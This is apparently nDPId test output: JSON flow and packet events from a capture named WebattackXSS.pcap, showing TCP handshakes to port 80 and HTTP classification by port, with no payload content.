-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":3,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ldFAAD4GMAesEAABwKgKMoVGAFBUeRhEuvJ2hIAQAOXpZAAAAQEICgE8jZMD5l8H"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347926328,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y4hAAD4GYkisEAABwKgKMoVgAFAOjvOTAAAAAKACchBF2gAAAgQFtAQCCAoBPJAbAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhWB82qzsDo7zlKAScSC3fAAAAgQFtAQCCAoD5mGPATyQGwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":3,"flow_last_seen":1499347926329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347926329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y4lAAD4GYk+sEAABwKgKMoVgAFAOjvOUfNqs7YAQAOVWhAAAAQEICgE8kBsD5mGP"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347927657,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347927657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NcxAAD4GkASsEAABwKgKMoVuAFCXD6SrAAAAAKACchAK5wAAAgQFtAQCCAoBPJFnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":2,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347927657,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhW4waOSnlw+krKAScSCP9AAAAgQFtAQCCAoD5mLbATyRZwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":3,"flow_last_seen":1499347927658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347927658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nc1AAD4GkAusEAABwKgKMoVuAFCXD6SsMGjkqIAQAOUu\/AAAAQEICgE8kWcD5mLb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347930265,"flow_last_seen":1499347930265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347930265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7993,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1499347930265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OHxAAD4GjVSsEAABwKgKMoWIAFCpfquPAAAAAKACchDu7QAAAgQFtAQCCAoBPJPzAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":2,"flow_last_seen":1499347930265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347930265,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhYivvJwGqX6rkKAScSA6vAAAAgQFtAQCCAoD5mVnATyT8wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":3,"flow_last_seen":1499347930266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347930266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OH1AAD4GjVusEAABwKgKMoWIAFCpfquQr7ycB4AQAOXZwwAAAQEICgE8k\/MD5mVn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347931529,"flow_last_seen":1499347931529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347931529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1499347931529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j75AAD4GNhKsEAABwKgKMoWWAFDyyRqRAAAAAKACchA1VwAAAgQFtAQCCAoBPJUvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":2,"flow_last_seen":1499347931530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347931530,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhZYdLW4k8skakqAScSBAWwAAAgQFtAQCCAoD5majATyVLwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":3,"flow_last_seen":1499347931530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347931530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j79AAD4GNhmsEAABwKgKMoWWAFDyyRqSHS1uJYAQAOXfYgAAAQEICgE8lS8D5maj"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347934152,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347934152,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DbVAAD4GuBusEAABwKgKMoWwAFC\/7poKAAAAAKACchDmDgAAAgQFtAQCCAoBPJe\/AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":2,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347934152,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhbAhVp9vv+6aC6AScSC5DgAAAgQFtAQCCAoD5mkzATyXvwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":3,"flow_last_seen":1499347934152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347934152,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DbZAAD4GuCKsEAABwKgKMoWwAFC\/7poLIVafcIAQAOVYFgAAAQEICgE8l78D5mkz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347935445,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347935445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lcJAAD4GMA6sEAABwKgKMoW+AFC8fgzAAAAAAKACchB1eAAAAgQFtAQCCAoBPJkCAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":2,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347935445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhb4dfTaTvH4MwaAScSCz6gAAAgQFtAQCCAoD5mp2ATyZAgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":3,"flow_last_seen":1499347935445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347935445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lcNAAD4GMBWsEAABwKgKMoW+AFC8fgzBHX02lIAQAOVS8gAAAQEICgE8mQID5mp2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347936727,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IMJAAD4GpQ6sEAABwKgKMoXMAFAQdrqBAAAAAKACchBycAAAAgQFtAQCCAoBPJpDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":2,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhcyowg88EHa6gqAScSBLswAAAgQFtAQCCAoD5mu3ATyaQwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":3,"flow_last_seen":1499347936728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347936728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IMNAAD4GpRWsEAABwKgKMoXMAFAQdrqCqMIPPYAQAOXqugAAAQEICgE8mkMD5mu3"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 